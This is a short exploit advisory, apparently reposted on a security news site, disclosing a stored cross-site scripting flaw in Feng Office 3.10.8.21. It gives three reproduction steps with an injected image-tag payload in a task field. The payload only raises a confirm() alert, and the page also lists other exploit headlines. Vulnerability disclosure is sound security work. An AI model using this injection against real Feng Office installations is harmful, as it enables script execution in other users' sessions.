Home Tools Exploits & CVE's Feng Office 3.10.8.21 Cross Site Scripting

Feng Office 3.10.8.21 Cross Site Scripting

April 8, 2024

Authored by tmrswrr

Feng Office version 3.10.8.21 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: Feng Office version 3.10.8.21  - Stored XSS
# Exploit Author: tmrswrr 
# Vendor Homepage: https://www.fengoffice.com/
# version 3.10.8.21 

1 ) Login admin https://127.0.0.1/Feng_Office/index.php?c=access&a=index#
2 ) Click Tasks > "><img src=x onerrora=confirm() onerror=confirm(1)> add task 
3 ) Click Add worked hours you will be see xss alert

Feng Office 3.10.8.21 Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

Doctor Appointment Management System 1.0 Cross Site Scripting

Kemp LoadMaster Unauthenticated Command Injection

osCommerce 4 Cross Site Scripting

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Vinchin Backup And Recovery Command Injection

Affiliate Pro 1.7 Cross Site Scripting

MOKOSmart MKGW1 Gateway Improper Session Management